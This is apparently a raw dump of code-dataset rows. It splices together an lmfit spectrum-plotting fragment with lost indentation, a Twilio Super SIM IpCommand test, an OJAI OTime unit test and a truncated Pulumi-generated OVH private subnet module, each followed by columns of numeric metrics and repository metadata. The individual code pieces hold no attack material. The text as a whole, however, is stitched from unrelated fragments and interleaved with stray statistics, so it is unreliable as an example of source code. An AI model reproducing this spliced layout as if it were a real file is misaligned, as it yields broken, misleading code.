for par_name in x_param_names:
init_x.append(cont_pars[par_name].value)
plt.scatter(sp.wave, sp.flux)
plt.plot(sp.wave, out, 'C1')
plt.scatter(init_x, init_y, marker='x', s=80, color='k')
plt.show()
# ##############################
# Fit
result = cont_model.fit(data=sp.flux, params=cont_pars, x=sp.wave)
out = cont_model.eval(data=sp.flux, params=result.params, x=sp.wave)
# print(result.fit_report())
# ##############################
# Show results
result_y_pars = []
for par_name in y_param_names:
result_y_pars.append(result.params[par_name].value)
result_x_pars = []
for par_name in x_param_names:
result_x_pars.append(result.params[par_name].value)
result.plot_fit()
plt.scatter(result_x_pars, result_y_pars, marker='x',
color='r', s=80, zorder=10, label='Fit params')
plt.scatter(init_x, init_y, marker='x', s=80, color='k', label='Initial params')
plt.legend()
plt.show()
| 24.65942
| 83
| 0.625918
| 527
| 3,403
| 3.791271
| 0.151803
| 0.08008
| 0.044044
| 0.048048
| 0.821321
| 0.821321
| 0.821321
| 0.790791
| 0.740741
| 0.711712
| 0
| 0.020687
| 0.119306
| 3,403
| 137
| 84
| 24.839416
| 0.645979
| 0.04496
| 0
| 0.710526
| 0
| 0
| 0.044547
| 0.018888
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc73405e735a8be6b1b2bd6fa82148184a240924
| 7,162
|
py
|
Python
|
tests/integration/supersim/v1/test_ip_command.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1
|
2022-03-03T05:24:20.000Z
|
2022-03-03T05:24:20.000Z
|
tests/integration/supersim/v1/test_ip_command.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1
|
2022-01-28T14:45:53.000Z
|
2022-01-28T14:45:53.000Z
|
tests/integration/supersim/v1/test_ip_command.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class IpCommandTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.supersim.v1.ip_commands.create(sim="sim", payload="payload", device_port=1)
values = {'Sim': "sim", 'Payload': "payload", 'DevicePort': 1, }
self.holodeck.assert_has_request(Request(
'post',
'https://supersim.twilio.com/v1/IpCommands',
data=values,
))
def test_create_full_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "queued",
"direction": "to_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.supersim.v1.ip_commands.create(sim="sim", payload="payload", device_port=1)
self.assertIsNotNone(actual)
def test_create_minimal_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "queued",
"direction": "to_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.supersim.v1.ip_commands.create(sim="sim", payload="payload", device_port=1)
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.supersim.v1.ip_commands("HGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://supersim.twilio.com/v1/IpCommands/HGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "queued",
"direction": "to_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.supersim.v1.ip_commands("HGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.supersim.v1.ip_commands.list()
self.holodeck.assert_has_request(Request(
'get',
'https://supersim.twilio.com/v1/IpCommands',
))
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"ip_commands": [],
"meta": {
"first_page_url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0",
"key": "ip_commands",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0"
}
}
'''
))
actual = self.client.supersim.v1.ip_commands.list()
self.assertIsNotNone(actual)
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0",
"key": "ip_commands",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0"
},
"ip_commands": [
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "received",
"direction": "from_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
}
'''
))
actual = self.client.supersim.v1.ip_commands.list()
self.assertIsNotNone(actual)
| 37.302083
| 156
| 0.534069
| 598
| 7,162
| 6.229097
| 0.170569
| 0.032215
| 0.056107
| 0.064966
| 0.884832
| 0.875436
| 0.856913
| 0.823356
| 0.822282
| 0.800268
| 0
| 0.065438
| 0.340687
| 7,162
| 191
| 157
| 37.497382
| 0.723422
| 0.015219
| 0
| 0.645161
| 1
| 0
| 0.112676
| 0.025885
| 0
| 0
| 0
| 0
| 0.177419
| 1
| 0.129032
| false
| 0
| 0.064516
| 0
| 0.209677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8a611ae49d9f9afb0888972cd48ac604d6550a
| 2,642
|
py
|
Python
|
python/test/o_types_test/test_otime.py
|
ojai/ojai-core
|
058b147e735fe95c83b339776daf79d437adae80
|
[
"Apache-2.0"
] | 51
|
2015-09-30T18:54:57.000Z
|
2020-08-13T09:35:15.000Z
|
python/test/o_types_test/test_otime.py
|
ojai/ojai-core
|
058b147e735fe95c83b339776daf79d437adae80
|
[
"Apache-2.0"
] | 21
|
2015-10-01T14:22:19.000Z
|
2022-02-04T02:17:26.000Z
|
python/test/o_types_test/test_otime.py
|
ojai/ojai-core
|
058b147e735fe95c83b339776daf79d437adae80
|
[
"Apache-2.0"
] | 25
|
2015-09-30T14:13:16.000Z
|
2021-12-10T21:29:32.000Z
|
from __future__ import unicode_literals
from ojai.types.OTime import OTime
try:
import unittest2 as unittest
except ImportError:
import unittest
class OTimeTest(unittest.TestCase):
def test_days_from_epoch(self):
epoch = 8587555
o_time = OTime(timestamp=epoch)
self.assertEqual(o_time.get_hour(), 12)
self.assertEqual(o_time.get_minute(), 25)
self.assertEqual(o_time.get_second(), 55)
self.assertEqual(o_time.get_millis(), 0)
parse_o_time = OTime.parse(time_str="12:25:55")
self.assertEqual(parse_o_time.get_hour(), o_time.get_hour())
self.assertEqual(parse_o_time.get_minute(), o_time.get_minute())
self.assertEqual(parse_o_time.get_second(), o_time.get_second())
self.assertTrue(o_time.__eq__(parse_o_time))
self.assertEqual(o_time.to_str("%H:%M:%S"), "12:25:55")
self.assertEqual(o_time.time_to_str(), "12:25:55")
def test_o_time_from_time(self):
o_time = OTime(hour_of_day=12, minutes=25, seconds=55)
self.assertEqual(o_time.get_hour(), 12)
self.assertEqual(o_time.get_minute(), 25)
self.assertEqual(o_time.get_second(), 55)
self.assertEqual(o_time.get_millis(), 0)
parse_o_time = OTime.parse(time_str="12:25:55")
self.assertEqual(parse_o_time.get_hour(), o_time.get_hour())
self.assertEqual(parse_o_time.get_minute(), o_time.get_minute())
self.assertEqual(parse_o_time.get_second(), o_time.get_second())
self.assertTrue(o_time.__eq__(parse_o_time))
self.assertEqual(o_time.to_str("%H:%M:%S"), "12:25:55")
self.assertEqual(o_time.time_to_str(), "12:25:55")
def test_o_time_from_date(self):
import datetime
o_time = OTime(date=datetime.datetime(year=1970, month=1, day=1, hour=12, minute=25, second=55))
self.assertEqual(o_time.get_hour(), 12)
self.assertEqual(o_time.get_minute(), 25)
self.assertEqual(o_time.get_second(), 55)
self.assertEqual(o_time.get_millis(), 0)
parse_o_time = OTime.parse(time_str="12:25:55")
self.assertEqual(parse_o_time.get_hour(), o_time.get_hour())
self.assertEqual(parse_o_time.get_minute(), o_time.get_minute())
self.assertEqual(parse_o_time.get_second(), o_time.get_second())
self.assertTrue(o_time.__eq__(parse_o_time))
self.assertEqual(o_time.to_str("%H:%M:%S"), "12:25:55")
self.assertEqual(o_time.time_to_str(), "12:25:55")
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(OTimeTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| 43.311475
| 104
| 0.68433
| 399
| 2,642
| 4.172932
| 0.160401
| 0.15015
| 0.144144
| 0.216216
| 0.735135
| 0.735135
| 0.735135
| 0.731532
| 0.731532
| 0.731532
| 0
| 0.046768
| 0.174489
| 2,642
| 60
| 105
| 44.033333
| 0.716644
| 0
| 0
| 0.647059
| 0
| 0
| 0.039364
| 0
| 0
| 0
| 0
| 0
| 0.588235
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.196078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5da6d5adae1db6c3fbb3f449376d04d9c897aabc
| 28,126
|
py
|
Python
|
sdk/python/pulumi_ovh/pubic_cloud_private_network_subnet.py
|
tumblewader/pulumi-ovh
|
fd484de69a247cf4f05c22cf73f1c57b973a1dab
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_ovh/pubic_cloud_private_network_subnet.py
|
tumblewader/pulumi-ovh
|
fd484de69a247cf4f05c22cf73f1c57b973a1dab
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_ovh/pubic_cloud_private_network_subnet.py
|
tumblewader/pulumi-ovh
|
fd484de69a247cf4f05c22cf73f1c57b973a1dab
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PubicCloudPrivateNetworkSubnetArgs', 'PubicCloudPrivateNetworkSubnet']
@pulumi.input_type
class PubicCloudPrivateNetworkSubnetArgs:
def __init__(__self__, *,
end: pulumi.Input[str],
network: pulumi.Input[str],
network_id: pulumi.Input[str],
project_id: pulumi.Input[str],
region: pulumi.Input[str],
start: pulumi.Input[str],
dhcp: Optional[pulumi.Input[bool]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a PubicCloudPrivateNetworkSubnet resource.
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
pulumi.set(__self__, "end", end)
pulumi.set(__self__, "network", network)
pulumi.set(__self__, "network_id", network_id)
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "region", region)
pulumi.set(__self__, "start", start)
if dhcp is not None:
pulumi.set(__self__, "dhcp", dhcp)
if no_gateway is not None:
pulumi.set(__self__, "no_gateway", no_gateway)
@property
@pulumi.getter
def end(self) -> pulumi.Input[str]:
"""
Last ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "end")
@end.setter
def end(self, value: pulumi.Input[str]):
pulumi.set(self, "end", value)
@property
@pulumi.getter
def network(self) -> pulumi.Input[str]:
"""
Global network in CIDR format.
Changing this value recreates the subnet
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: pulumi.Input[str]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Input[str]:
"""
The id of the network.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: pulumi.Input[str]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
"""
The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def start(self) -> pulumi.Input[str]:
"""
First ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "start")
@start.setter
def start(self, value: pulumi.Input[str]):
pulumi.set(self, "start", value)
@property
@pulumi.getter
def dhcp(self) -> Optional[pulumi.Input[bool]]:
"""
Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
"""
return pulumi.get(self, "dhcp")
@dhcp.setter
def dhcp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dhcp", value)
@property
@pulumi.getter(name="noGateway")
def no_gateway(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
return pulumi.get(self, "no_gateway")
@no_gateway.setter
def no_gateway(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_gateway", value)
@pulumi.input_type
class _PubicCloudPrivateNetworkSubnetState:
def __init__(__self__, *,
cidr: Optional[pulumi.Input[str]] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
gateway_ip: Optional[pulumi.Input[str]] = None,
ip_pools: Optional[pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PubicCloudPrivateNetworkSubnet resources.
:param pulumi.Input[str] cidr: Ip Block representing the subnet cidr.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] gateway_ip: The IP of the gateway
:param pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]] ip_pools: List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
"""
if cidr is not None:
pulumi.set(__self__, "cidr", cidr)
if dhcp is not None:
pulumi.set(__self__, "dhcp", dhcp)
if end is not None:
pulumi.set(__self__, "end", end)
if gateway_ip is not None:
pulumi.set(__self__, "gateway_ip", gateway_ip)
if ip_pools is not None:
pulumi.set(__self__, "ip_pools", ip_pools)
if network is not None:
pulumi.set(__self__, "network", network)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if no_gateway is not None:
pulumi.set(__self__, "no_gateway", no_gateway)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if region is not None:
pulumi.set(__self__, "region", region)
if start is not None:
pulumi.set(__self__, "start", start)
@property
@pulumi.getter
def cidr(self) -> Optional[pulumi.Input[str]]:
"""
Ip Block representing the subnet cidr.
"""
return pulumi.get(self, "cidr")
@cidr.setter
def cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cidr", value)
@property
@pulumi.getter
def dhcp(self) -> Optional[pulumi.Input[bool]]:
"""
Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
"""
return pulumi.get(self, "dhcp")
@dhcp.setter
def dhcp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dhcp", value)
@property
@pulumi.getter
def end(self) -> Optional[pulumi.Input[str]]:
"""
Last ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "end")
@end.setter
def end(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end", value)
@property
@pulumi.getter(name="gatewayIp")
def gateway_ip(self) -> Optional[pulumi.Input[str]]:
"""
The IP of the gateway
"""
return pulumi.get(self, "gateway_ip")
@gateway_ip.setter
def gateway_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "gateway_ip", value)
@property
@pulumi.getter(name="ipPools")
def ip_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]]:
"""
List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
"""
return pulumi.get(self, "ip_pools")
@ip_pools.setter
def ip_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]]):
pulumi.set(self, "ip_pools", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
Global network in CIDR format.
Changing this value recreates the subnet
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the network.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="noGateway")
def no_gateway(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
return pulumi.get(self, "no_gateway")
@no_gateway.setter
def no_gateway(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_gateway", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def start(self) -> Optional[pulumi.Input[str]]:
"""
First ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "start")
@start.setter
def start(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start", value)
class PubicCloudPrivateNetworkSubnet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
> __DEPRECATED:__ Use `CloudNetworkPrivateSubnet` instead.
Creates a subnet in a private network of a public cloud project.
## Example Usage
```python
import pulumi
import pulumi_ovh as ovh
subnet = ovh.PubicCloudPrivateNetworkSubnet("subnet",
dhcp=True,
end="192.168.168.200",
network="192.168.168.0/24",
network_id="0234543",
no_gateway=False,
project_id="67890",
region="GRA1",
start="192.168.168.100")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PubicCloudPrivateNetworkSubnetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
> __DEPRECATED:__ Use `CloudNetworkPrivateSubnet` instead.
Creates a subnet in a private network of a public cloud project.
## Example Usage
```python
import pulumi
import pulumi_ovh as ovh
subnet = ovh.PubicCloudPrivateNetworkSubnet("subnet",
dhcp=True,
end="192.168.168.200",
network="192.168.168.0/24",
network_id="0234543",
no_gateway=False,
project_id="67890",
region="GRA1",
start="192.168.168.100")
```
:param str resource_name: The name of the resource.
:param PubicCloudPrivateNetworkSubnetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PubicCloudPrivateNetworkSubnetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PubicCloudPrivateNetworkSubnetArgs.__new__(PubicCloudPrivateNetworkSubnetArgs)
__props__.__dict__["dhcp"] = dhcp
if end is None and not opts.urn:
raise TypeError("Missing required property 'end'")
__props__.__dict__["end"] = end
if network is None and not opts.urn:
raise TypeError("Missing required property 'network'")
__props__.__dict__["network"] = network
if network_id is None and not opts.urn:
raise TypeError("Missing required property 'network_id'")
__props__.__dict__["network_id"] = network_id
__props__.__dict__["no_gateway"] = no_gateway
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
if start is None and not opts.urn:
raise TypeError("Missing required property 'start'")
__props__.__dict__["start"] = start
__props__.__dict__["cidr"] = None
__props__.__dict__["gateway_ip"] = None
__props__.__dict__["ip_pools"] = None
super(PubicCloudPrivateNetworkSubnet, __self__).__init__(
'ovh:index/pubicCloudPrivateNetworkSubnet:PubicCloudPrivateNetworkSubnet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cidr: Optional[pulumi.Input[str]] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
gateway_ip: Optional[pulumi.Input[str]] = None,
ip_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None) -> 'PubicCloudPrivateNetworkSubnet':
"""
Get an existing PubicCloudPrivateNetworkSubnet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cidr: Ip Block representing the subnet cidr.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] gateway_ip: The IP of the gateway
